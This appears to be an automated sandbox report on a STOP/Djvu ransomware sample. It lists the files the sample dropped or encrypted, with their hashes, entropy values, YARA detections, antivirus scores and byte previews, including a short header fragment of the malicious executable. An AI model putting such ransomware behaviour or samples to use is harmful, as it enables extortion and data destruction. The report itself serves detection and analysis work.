                                                                                                Preview:{"ramdIc..,0.^.....9....w..1....H...J.y.(...Xk...,JG...`E..H7...d..H.M....._..9...frqF........-.\@.N,g.8L8.......<U.O......iQ...6Q[..A~..y....P..U.lQ....a....p..^-...;i.J.G....T..uB...*...+..O.9..q..`..S..n....k.f.w.g..)...$j..!..U..V...T1.~..D...{..u..d.*.k...i..[...n...0...D....8x.%......f.V3..K.n%.n...i4.JXY}R...y...P.m....o.o`.>.#.....KB...Y..<..L.6k..dhm....ax..0p.5:?.p..r.......4.a..M.".-.......Y..EcP;..|k.6".BzoCC.>.....X..e..Pt.r.q.+....D|H..E.......27..h,...RLveU.4b...3.J......;.iA8..E....w.A.O..iVG...u.G.....&...#."....z.!.w...OH|.UH...Y......X...*_.Tr}.(p|..7.4....d...6C..`..hMR3-$...r.d....m;...iB...m...$....L][...^....?].b...A.o.9.*.A..C.H)N.&.$<.o..)..!..l................\............K....U....%SN..L2.3....G.7.!w.....?.zCW...3r.--c..p.PZ....n.....v.-T....0%.IH..G..Cu,.&.G....9.nW.$..i...{../.N..E.vk'...dIZ.>:.a>Dq......8F.9G.9.x...q...Ci.b..3g..W.Iy"_O.w......Y..<z..;.l{..#3..%..t.g.\j.L.6..P..F.oQ..9e.>........
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:MS-DOS executable
                                                                                                Category:dropped
                                                                                                Size (bytes):42164934
                                                                                                Entropy (8bit):7.947664446230851
                                                                                                Encrypted:false
                                                                                                SSDEEP:786432:GwQNeYDxVRrMPJy7LVV4NDDmdrZy9wOtg5gGOdjtjSNu4GIluUNj56I596:/QcWxDMPnN+dk65gGUjku4vNjLj6
                                                                                                MD5:E4630319C215B195807CFA5393486323
                                                                                                SHA1:B4E936266956DB42CF152914B1DD5C84B74E3BD7
                                                                                                SHA-256:F4F755BF18E83FECC356D2CA145171A73D4E8037A6D25E379B88AA90B2CC78E3
                                                                                                SHA-512:7DE7BA63D856B81CCBE2D3BA234ABC4E3F551280C86E0152E15EA459317ED6DB9B3218F72286C8DC2E275A313EEED311C7B56E4DB71AE54C62EB4C9003EE4EB5
                                                                                                Malicious:false
                                                                                                Preview:MZ....n..q .e.4.....I.Fta?..^.!..y....o..l5za..C..YQh....K..7........p..[|.].y0.............V..)%b.X.n...-.........U..-.....d...}...g..f>.^3..ex.......F.... 6..-.K...U..;)v.....f..*.p>_...c....IZ.}......1....x.`..e..m......h.....RF.6....i..yAVr....9.....[...H..[{.MV........$..Pm.."..~)....A.X.<"g...-...+m...~.|.....],n^+.O>uxst........^..t....../p.O..HEu..Q.....=C..p.U..t.J-6.\=....<...b.N.....p... ...z..J.|..az.7}K.j.^.yW.4...'.=/;.+J.e..V.n%.....5.2. .$..A..`....;=wm..5.....`....cv..z.E.U.o.O.....YX[X.5..cO..".v.3.O..`!.c..z.MP&i....dEf~.)s.l...C..v.5.JpE...op..r.5..JF:...........J......-.x.H.... .....Np.....i.s..'.S;..:...."L....t.H{M.r.W.....%.q..'...5$..Lj.=.....z.].GV.<..},..d....`.n.....Bo.....2^...Br....E.s..t3J.C..$.6.$.t L]t.9.P|{ ..*.R.....Z<..~..."&.V.........6...J....n...$.b.....}.5.u.. ..VB,M.9..L..!....q.G.A&.]:m\.....q.u'.$g<....LL.=.9..*.*..*...f!......L.6...< 6..?.I.4...G...}.......K"..If.YB..1.#.^. .W..$..~..K.?.7uI....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1031
                                                                                                Entropy (8bit):7.791756304816032
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:tGBTCnMjEZ4L7I7GRN7tmMj9h36/lf8SaaVOqj5D5x3bD:kBTCMjRI6RFwMRJ6/lfHOM5fLD
                                                                                                MD5:DA3CDB8ACA3CC24E8E6AA281CE3D8913
                                                                                                SHA1:2CB58AF6A062909BBABB16AF1D85A90E25983316
                                                                                                SHA-256:70B86291F6A2B0430EF4753714542CC03A92E0734CFF649A6E9B318E8A0D7396
                                                                                                SHA-512:B040DF0EE46FED129109C9608E9E8C5E083E8244F52C5E08A21219E0BEF601415E58AD6DB64C131C071968901642FE57D05770860FEA9BCB9139FB9CADFFA89D
                                                                                                Malicious:false
                                                                                                Preview:..[*W.2.PU......@..^.`.7.h.b..~...BnXs..mOX.-HY.....v..J..+q..ya.V1*9...Y.E._$....zF.. ..]o..Ex..z}0.Zx..I..O....V%R....."..?6.v2=..f..zl%h.....r_.;%..I.7|n....Dg4"..%RIr...nKr.u.3.}.+.kD..V.4..........H.gsz3.....?..z.....`.5....'....z.A.[,.0.....3.d.D.o.k.C......}}.ti,..%=..`..JJ.>.l..6.K..N.'...|.zk..]..k...y.. )........$oL.}....^^...D{.g..wZ...v...':..k.j....&^.M...I...f(...RH.....b......tR..)..x.<3.....3.....E........E...&.\.....P..e....9.%.....#.&.`.......0.L.....Y.....w;w&J.M..._.d..z..\.#Sl.....olD....m..F..S..Z)T?.MJUQ.@/.c..cc...`....0 [on...dD...}..{. .H..`...{j.>..$#...FJ...cA0.Z....G....u...u..T[.q..,83.....-...Yn.......VL.D..l.A62{.c.{..d.yO.eo..J........sE.{.........m.}.z.(.....[.Ib...@T.?."p...GK%..#..o.j,1.;.bf.r.l..2..?q~.B_j...$....x&..]}.#....(|...2.ho.`......?u.......Y...(......-kP.O5.m.}{x.o.v.PF.%......o....b<..0T..Wr..s.{%....z.".n.Z..-......T<..."..&.9q...z...:..r/...i.....BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6130
                                                                                                Entropy (8bit):7.970611337045222
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:MXLHEw2dAOyTS/LynqY3wSj/jc4fUjcQ7wqfc0YsScO9iq01nJGylkJFnatERkeI:1RgS/LyqY3Tj/CZfcbsy01ngnPRkeiDH
                                                                                                MD5:C0725FF5F959FBAF236BB43D440FA754
                                                                                                SHA1:B17E9E2180A783BE22108BBF124B2FEBCC2F2874
                                                                                                SHA-256:A1606011616C4C96D30A8C2EB2C7679E14061B88E56F37A57E32547A26306597
                                                                                                SHA-512:AA0B1AFE96228138CE34D7662C0041821567A7B42C9D6D3A0519BED4103028A197139A31D401FA9CADADC7D64AEFFB8D35A90EA507D8C65B5DDD00859BEE3FE4
                                                                                                Malicious:false
                                                                                                Preview:.PNG......g..z"..bO...%.Wl...;..L.e0....^.+..;.K_.S......!k[....%..4...jOv......u.<..e:..1zv.c..=.5...<s$I.a....\.Xg.........v.y.3.,..._.......>...L...L.-.G.Nj..^.>....H.......EvnnV.!@.5P......r..?A..d......o-...k.*...bI.).Z..b......w.;:.d..&.?.>...I5.,OE...5@.z.N.kUd.^..S=..y.KO.M...l?.......rw.+0.W.=T....iCa=R....o...i... i.............bCfu.o...]..3.XQg.[....m.[.Mi...Q[........M.i..tZ1.....U..@>...O...%2...mC.h..UC......Fk].?....o4..x....}......<...~u.F....?.._.. .*...."`j.P.d...."...;.>...C......*.a..lX...6.X.o.M...9.$......=1#.!.W..Sz..8....%...Ii.)..eoD..y.....0..pp.VwBV......5...5xl..H._..X)...5.......b..'YQ....z.......E1..2..Qzz.Y...}nP...^8....y4...(.........b.N..'..V.t...Ln.-...T?../ph...,&G..g..`.Q2....e....P...t^....O..H.hTk.0D...q.{....3..K.TIc...++.)P.S..P.K+...bO..(.......J..;r.<.Tb.jc..j.ov..AZ...T..T...l.T.....Z...PMT.3..T.a...3...5..l..*...a.0.t...ho......T..d..$K.N..ak.A.......#{.kTq.?>...Dn6d..b}Dr9..]qY<....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6130
                                                                                                Entropy (8bit):7.97228548278529
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:3WcIzsWkyGbe4buiN+mxJ3d3MYh0D3ae4cm+K1jkQfhmeo+PHofvHnmD4PnlwKWF:izs5H6yxJ3d390ue3KwQfZHYeDsjQ
                                                                                                MD5:098059D430B885D16BDD5B6377B67E4A
                                                                                                SHA1:0D6D3BA35A4CAC492088F8BDE1019AE3B429CF5E
                                                                                                SHA-256:85B73119F1E7037954C7B521842D3D20C0CC9ADA529DEE55E5BC4A3703DE9F86
                                                                                                SHA-512:F5B4DCC6DEACC796067CFCE0D24268DBC67D456310E6E54D7D9C6B4BFC47C26F3FEAFA7F364C4C82AEAA44F897502966E7C6E1E0E5D6AFF73CC0F8462E68A02D
                                                                                                Malicious:false
                                                                                                Preview:.PNG..@t.]*.W.A.....H....ew...H..{..C.k{+p;.;.;6.o..q&..oc.....hw.P...<.s..M.../.]vt...".Q.X...a...S..t..[.W.[.K.;t.u.?/f=....Vf;.C..m.....k..8.......2Z..b...../W.X%..&q.o2.~ .!l..' `n*dW.l.0J.s.!n.........G...?.....h_.1.....q.fh..";..#v.AQ...E. .e...!\....o.F.].*....;....".5r'.;...BUxg..o.k.{.*...a.&%`./)[....3"mA.?$V..O`....].Cu.1.^.U..jI>.I.p8.m.4...LW_@.K80d.now..[.Y<s..&.a..=..@.......]c..$.ivA.e7;.....D....u.Q.w.....9hb...'....=...X..%.c#.vGMk.e....J...Z.}.H..U....[fpb...@j..u^....A....)h."..>1Mg..n.&../....%(...OC..x.'.a....]{A...b...G.........Zu..9....e.-..D..7^.n;..ntG."e..J..^..s..SS....&..l....$.I..........!?.{.:.s..R..<D....hL.H.j)V....v....!.S...v_...E.}.=P..i<'..@:2......A..ix.`..5M.1..=2...O...+".....\..Z..$...C.;..Q......\I....&:=qO.....7z.......X..$.=P.....G.i.bq\....t.-L.1".....=..L........;B.ZDQCA.b#2_.k......y.........n..B.]>..4.<H.Q...U...-/.,F......[(./Q..k.n...)....K.4...a.....R.Q.WWbs].4z.\...6......}\...p.ZX`./...<X.`.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6130
                                                                                                Entropy (8bit):7.96495795123903
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:co71an/yoPTu9PR3mcImVLii+PgRzFFYXKsXJ/ChofcjoImuplGQ/zfuUpmHHiRQ:cocnz6PNmc3LjxFFLs5/ChHkIxGsyFH7
                                                                                                MD5:AA7FE1CD72A793474415375350A11C62
                                                                                                SHA1:D27745B7610A762615138D01D9609AEE3ACC69E6
                                                                                                SHA-256:F4E966C9251432AA1EC92F63629325927DEFED4DAA640D750A69F99365AAAC62
                                                                                                SHA-512:3DCF6C81621411F3844F05FCD94361B997264777EAE9D30BEC1AA94E0AF747B0D7523DC0471A73F5D156A0EB02B12D81BC0DB9F9CBBBCB8D7841877467694B0C
                                                                                                Malicious:false
                                                                                                Preview:.PNG.,.G....."..@.Z\.Vz.oc.*..|.~...c3........(...j..G..XD,AfP.qg.....,R...j@.k..Z.....cH.^..Ki&'.<.....O|....t....u.'&........F....4.SQ5I!..E.....].UxH.}.P.!........o.I~:K..?..(..zw.L........U.l.Q..7x]f........3.a.^).R.G....t.!Q.~a.Fe...E&.j..H.o..Az.j<..Im.Y.....<..n3<..|.w......M..]i.~%.].8.....?y.3vzc.....i~..e..........q5.:...;PV..(.<K.B.7..a@<..@6:1+.....-..E...6...O0...C~..A.L...s.d.p...+.".%.'2.....o.H..r...E..u.F.5-.2d.t..l8E...C"?..FN...P.....Mu.I#.......X....7n" ...t.<K.-.,...._..D...../............6......$(#4c..U....P....6RlG.2...r.ZN.....8...oz"..I..;A.l4..?.V>8.........L\.-\.i..7.<TH....%Re?.}..$..).........m..3./@}....0.._....:2..^.Yl.e..N.....fo..Z.&,u.#.No...#.....[[.D=KK?..p-.H..H...D}.......g.g.B....$..tg.8....E\I.t...;..`%.TB.w.G..I....I^Pfc...{u.|..........X.....w.rR..*.{.%.2hz.....O..d.J..L.XHgN..uDwex...I..s...|.R........h.+(I..Y....w....L6.....\~Sr.?.fY....?.^.....v..D.2e(.D^..Z.=..L...^. tc... .P.qi.G.......+>.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6130
                                                                                                Entropy (8bit):7.968027131950292
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:BXrIhfqVciEsaWZAkmZkj/hkkchDKlb5ZKHY/a1tugmPGvfmvVmD95OJj1t:BXrhEsXCk5DcQKHLzugmPGocvs
                                                                                                MD5:F27CD025D406BB68F6943F80351A78C2
                                                                                                SHA1:2D45BE0D8D5543E6F120DA0CCBEE4B44528CA559
                                                                                                SHA-256:BE703808B0ECBADE051AF5E3D933CC9C1B1C4B1EB39DE9C4452B4014529B5F5E
                                                                                                SHA-512:63199406CCEF42BC19101CEC8BEDCB510C032CA4841127C72679C769D5336299E8D3F40008DDEB8DE1CEFE933824B6A3E0CBEAD16E72255AF7EC62B8507147D8
                                                                                                Malicious:false
                                                                                                Preview:.PNG.~1Py..E.y.Fk...3..wb4../n....I..05..1.`.{..`.Bc..k.T...Q....~.......~..NxNU..s..*...GI..9..6&..'..Q."...A ...sA,a6..F..*XH$%/&z...,>.R...3RR...}(....,.V...N...x.xwS......)6aZS.O...LM...'.kp......S`.%..]..)g..Jh.J.t....&.H...) ..>kj2...?l..p....pI..+...U.....8.8..../N....p.f.y.uM...s....pJ;P.....$1'.k.h.$,.Qe!y.g.(..KU.y...!.R......wp..14.:.on.R.3.....3...3.*...@.8.C....{<f...+}K..7$...-.Z.xc...>.xjH..Y.J2.cQ...o...Q...w........T.rkR.&...[@ ....O........,...\uS_..;W...\..EQ...3.t.].u.m.g.M.....@o...z..,.......R.m...W.....%....s.....D.(........F....P#>.(...4/.$T"$;|...E1r../1\X..3..;..w.8...(K....f.W....>J.._..p-H.......6h..!nW|Y........+Y...9Y....v..(k\y.jW..0B...n.h.r...=.......I.V..q..A6n..u........:...|.e.v....F..16YK....c....(..........}D.8S..P......R?XD.z.@e.T6.!I..C....s.K.!+.D...........0....>.U.>...&Q.Nov...t....D..c...Y,*;.!.....I.....r.V9.......8.........T...|..$.5.{.8.,h".........o.........`F..f....i.45.._h....Jv4.B.I..(.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1243
                                                                                                Entropy (8bit):7.8321978943141985
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:gAft3ysvMk79YACuSi7FiltogZVotZyWCvHzbYrxZ5gx3bD:gazlhmNiFily/7yBvTULGLD
                                                                                                MD5:2AA12E5934F40F773FF3C317A03721BB
                                                                                                SHA1:515CEEA8CC7C27724CE035718602A386639F74A5
                                                                                                SHA-256:88A4A13F36D302777463C65C77F99D2E1874835F9DBC9467E1C2CCB733113B4A
                                                                                                SHA-512:DE0A8FC247ACD97EB744BF89757CE699E7F957FCAB117812E18491ACED76E6295BD83557B5BC9532FCC5F1B60F07103A991F0918413B00382A936AEA3698ADF4
                                                                                                Malicious:false
                                                                                                Preview:<!doc.n6R.....vt..e,.T.'.$......O..~5..G...T.`....,.H.....d.\...4b........Q.b..A..%..$-M..>b...1.....BWp..b.......G...iT./..:...*.=..k.<r.L..~.J'...y\.xw...S._O.+..q.n.....E..#0;[V.M....[..Q.t....01.B-...!^.........j.D...(..o.L.0:....y#...x..-j...?|F.[.e.@..9...T.K%p...Y.N..JJ.'....M..*..`b.^.l6.?./cI..I.{L0... .m...Vj..x\..&.t..}.skd..Dz.-w.Y.<.....(.B.=..m\Y...ip.Z.`.s....g..|..d.I..[.k.j...9..G..E..|.6......)......O.D...0.@A.kMQn....']>.....=.2Z....7.LE..C.iZ...Y66......vx.......|..n...*9 #...(..f-..,.....L...c...E'{.. ........*..G............F......@/.]P....N...q.Q.aLg..;...n..NT....e8......\vd..xK......t.^....."li.....(.......|....D.E2@s.....e..+.....p.....$.....]..7Z.t.D........d...tZ,. ..eu.#.4(..f....u.;.z[...z\8^:.;.@(..G].L`..pn.IN.DZ..........:.lLn.w|.jUX.........t....T....Q_._...d...0....72.qv..OD<..."...c.CS.'.....#/s..D...k./.f...<a.....4].8l.7&...G..$......i....R.}s.`Y..n.5......>..7....eR...b....-..<v..e.....c....9E...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1193
                                                                                                Entropy (8bit):7.810273563487521
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:1lUHSzm6tH//Wi0ydK5PLEDuEtu2dpfjSTw1vC7u0L5mx3bD:1lUyfV/d0yK5DEXdhj41F1KLD
                                                                                                MD5:B4AE0DEE448908867683A46E57C7D69F
                                                                                                SHA1:F889F688FB053BD1FEB247F4B8B11A85C2109CD7
                                                                                                SHA-256:96860DBEDA88DE97B926352A8C746840AD3C5126D1DBD85BA7E0303384118BC3
                                                                                                SHA-512:7493DA044F0AFCBF16F59B8AA8A0E6EFB5935E1D2ACA3EDB4FE1AF868F2F118D24E88E056FD3AC9273F79B9B435EABB7D58A2A568B7914F44434A899CAE5B8AC
                                                                                                Malicious:false
                                                                                                Preview:<!doc...N.(..Q.X/1.}(.]/:wF.....{j9b..w..c....v(To.Sn .....2D..c.!....d..'`q.r..e.". '.2.}R..Q1...P.4....@.....'$i.`:D..w....`\...UZ.96.bA.......M9.p..&.......H....n.>...o...g...3....hQP..mp[3!..,|...1.k.0)....}E...up}....r...].pL...|.^n]..).x2v...ap.0.....]..,1..I..LP.)9..JA...j..$.5.h.R...{1Rl.{V>)I....wq[:.>..ie....!...e.&.L$6.q.;p8r.....uj.E.........)1/mH..-.@i2....O.....y.k......g..R....Zr(...l .3.j.C...^.....~Z...g...5.o.pQd..HZp.......'&...0..!.....t.B1f-.P.zi..b$;.N.h...7..\..j..T..p.2..b......E..MqK..@......D........&.A...Za.%......c.....g....l........I..>M...b...<..E..i).R...>8...l.Q.U..q-.=l.}.6...!V.D...b....c.`S:..p..Z18r....#.y.m.Q.U.f{.Z-s.B.b.......-.o.#&&......}.qi........|]...c;C....v........$.!JK..n.x.....C..A.Za.P.vt..Q..#"f...&..h...d..B.i..g.O8..x.......$......A...M~j..*...;..s(x~....{!. ....H_.S.;..G[`..S...Z...-C.....5..|\6....D N#....`+....4.:O_8.Q...w.z.b.yykCMMM. ...1...SV.o`..SS}Q.d(eb).GyL[..Q..m.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1150976
                                                                                                Entropy (8bit):6.657266362346896
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:ZBUIKn/vwOXGUXAjCymYZiVtElVIBT2roqnTSSxWeT/dRPOO82WQHUq7:F0dwAYZt6C31WeTVRPOh27Uq7
                                                                                                MD5:5CACD6F1B5CEC25F3F0B0B3C4D5807D3
                                                                                                SHA1:41B8851BC57462502B0113EE1F2579DFF5D94F4F
                                                                                                SHA-256:C73CB93AD9AD6D003B505CE2B960D75467AD612786E0559C74DCA18426FB9400
                                                                                                SHA-512:7D46037825E5F34F02105C45EE05E03E4C2D7E73889A43C4E47704E27E563CAE63F5D0DFFB01A2D628AD0B3962E31CEBF44DBED5892B6E1A995C45EE2C0714B4
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, Author: unknown
                                                                                                • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, Author: ditekSHen
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 87%
                                                                                                • Antivirus: Virustotal, Detection: 76%, Browse
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(O..l...l...l....7.f......+/..*...h....9.m..../.m...a|..Q...a|7.s...a|.......&.n....8.n....#.M...l.........d...a|3.m....6.m...Richl...........PE..L...7..]............................AA............@..........................p............@....................................T...............................,...`...8............................Z..@............................................text............................... ..`.rdata..............................@..@.data...X........d..................@....rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:modified
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:false
                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):67138
                                                                                                Entropy (8bit):7.997272672125357
                                                                                                Encrypted:true
                                                                                                SSDEEP:768:E/tTNUCAuxgCC4UnsSOhm//2QmpDMguTInjNz5iwbC+OX6qmIsY4Vkb1TorQqjxh:wtRUCRlBLHPDMeJ5E+q/sY4jMgt
                                                                                                MD5:38B33973E097EDD38D5CC6F7CC989971
                                                                                                SHA1:EABA9A6ADD64253F9FE3DD591DB72951D271CFED
                                                                                                SHA-256:50A135DA55AC101110D818B23F10081DA02982BC9845EC1182A7158DF1CFDC97
                                                                                                SHA-512:6927A4D5A3F00463A2DCFA09522FB5EEEFD59844C3EA8B6F200B2F5A4A955AE78FB6E5FED73171CF1653087B98913801CFB61A0A36C0DD95667C81EFC9DA859D
                                                                                                Malicious:true
                                                                                                Preview:0.....d?~N..z..7.7......,X....o..r..r.P...P.......HkW..a..Rx...]H....#..G.F.....!*.2....;...b.+U>..8.....*y.C..'../yJz"...u..Js-).!@.@8A.aS...N*Q...:.x.Z.9kW...H"......N..Rs_/....(#......eG.E.N~..;A.V.HM.@9.}X.,...^P..w.,MN.S1aL$j..nc.%..Dp......}....{.K....d..&...KC..?.&..a...u..[.d\\..(.-.].?.|.A.V<n.p.1L0}.k].!.....;...?#...........uAi|.....ryH\z..,....*..../................J.9..7..qD..b...J.0..$a.....S.!}..g...&Qrqv'6.{X.RN.....x.....U.PF..s..,.V...!j].....x.'.\...[.#..7.>.Y.@".....v...!-.N...._X.p........8`......>..sH. XV....k.m..)LV.t....$.?..r....ak...H&9.Qy.=.I.:p........d.L.#....K....{.|..h..;...+...k../(..|.t)..}CZ=..k.l.._..).2.(.H2..U.#.N.......f.....1L.+f4...c........x..y.....j.}..k.....xXij](.0..A...e....C@.`^....s...J.r.4...Q...........X\e..a...#..&..+.VJ..........#\3.....x.=...M.k...t'^OH..}..4.u.j..n....[..%Z....D.z...G!y.!.C(.O..("......0\.D.w.8u.'.........E..;#.....4...,..?...*~+.^${.U...N.L. ....)....!)-~.z~.U.a.k
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1071
                                                                                                Entropy (8bit):7.776908884954541
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ywiSZq36mwCFUwmu9gkCyqVgtAvKPEYt+XN86qztAiKJd5LN5x3bD:ylSZJCBmaCyigtAvKPEtd86qzoXlNDLD
                                                                                                MD5:7FB166E120C6F70F44FF2E94BE71A252
                                                                                                SHA1:53F06CFA7C724FE5DDFBAE7F37B2F6E5D6DCE245
                                                                                                SHA-256:747038FC93E1538F2259DD89DA0EF2AD7F93EA51C7D7777E26562F780E42A504
                                                                                                SHA-512:4C71BBCCAB1125A40C8949A1728D837EB06F7ED217BB4D633DF3A21312F4BFFD3A2D7410A768CE3DB5D15501BD1D3F56D91A8E4AD133C56206044DC5D426EE4D
                                                                                                Malicious:false
                                                                                                Preview:0...0?t...'....kC.*\.c.0.B...er......_^[..sS.F.}...-......i.%.5.._..1.)....'.~....n(..o.Q....B....nm.LUZ.1.n.:#...... ....U..J...fK>B.d....'.../....j..,Y.]..$.vT.\......l[..C.s..[.2.&;.F[zq..jB..;Dq.1...h...M.N.D...0B.....Lz7T.!..w.<..[.~......3....).+....1.[j..i.R...BX..1....).,s....M..c.........q@.{m.....%l..D{...!.jx..,....3...@n...u...K&o..2._z..,......A..d5..B}....v...b.g.i.......z..b....0W."e...Ri..F.........l0.A...*...X.r.....3..%7U...%..s.......}....a'.........x.vY..>.?..f.|W..&;R..ub}A;..SP...........)..e+...T>.Sf<......BY.N.;p..5Q...,.k.....Jn..E..?....b..R.x..........u....M..t.$I..t|.M.......Q.!..M,.j.DUl..o2.73[.\.M.c..U<M..s..].?....M...W..=.X.6.....D...Qz..K..m..m.*.6..1.A.U).SQ..g..N.9....o....d[_.U...;..GCt~.F.................Rm.'.wN;......x|..K..Ka.<)T/.....F2O.{...D...X......h...Q....7..4vi......n.|#1......9....|...Z...<..../..r.......@P.]=.{..FL...Zs.E.{-.......zC...d.K......V.<.\f...s.#.....7\j^....#...h..[5./BUcuB8P
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):370
                                                                                                Entropy (8bit):7.2907749158951045
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:zCzRd1uI5+y9+7BF5idEvZBexBJzt1CSS35T3P8ziYTxzQng2JOWc3cii96Z:zCzxuheaBjiGZBeDQ135T/8mYVQnggJ4
                                                                                                MD5:EE4E6CB03A65CA84AE62170E0036B061
                                                                                                SHA1:1D45F54C17DC28A47A8C9A800A88DF2947B5027B
                                                                                                SHA-256:00D3924488B501566AF754A529A245493D1BE2FF7745C7AF04AC1E09B5B19873
                                                                                                SHA-512:3DF3DB26E60625BE174189227D80A1A5742F922FE8092FD8380F8288A484518CF2AD3AF2D3AD5F90EBC90163A00BB6E1F8A2DAD70805247FC2298BABA174710A
                                                                                                Malicious:false
                                                                                                Preview:%PDFT...Q,..6.B....v......p!Y..0......U..J.f...Q.8...66....:x./.pJe.....V...........S}.....|Sf./......2..._d.'....k*...e;..KZ.-...&.$..f....S./.-..+....}....z..I....n=X........v...~f...Z.{.EUdA...gX..>.g...i.....mF....LL.g..."n.1z....^...l...p.T.;....!.@?..n..B}k...+5...8[......BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):388
                                                                                                Entropy (8bit):7.330662584793466
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:N5DpNvm2Fqwxoy3M6PEjIp0vKIKEhCYHDmIe1pNdEAA2JOWc3cii96Z:NjvFFo+XPEq0nHiBjPGgJc3cii9a
                                                                                                MD5:1D53490445FA4EAE955735323ED206BA
                                                                                                SHA1:7A449882202C822564015DA0A0B3EAEF5A354CAC
                                                                                                SHA-256:33639715F0486304FD168872969399B2D366008DFE0727B8DE39C8F067288F28
                                                                                                SHA-512:E0831620B998BA773EC271F257D8B273C088AD5AEC966AC1076E19FB3BCF622BC4F1038EECCA1C821613CE611DB686392680346C62703003EACB4E37ED334F86
                                                                                                Malicious:false
                                                                                                Preview:%PDFT..>.c.......c.Y.ce@..m!.b.,Z.N...Fev1!aq...g...`+..g.V......!%.M.a.q3....-H0R.M.'..C....F..k........[#&G.j_.^.|../nUS.R....h.DJj...6W..\Y.[.\......k.a.H!......!.pU..3.D.7mo..#x..D..n3.z,..TW}..L...k.. .]....L!...33... ..."=.,....HJ"5ng..(Ep.......I..L...0.E.@}......I.. .r..".Q........X....BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
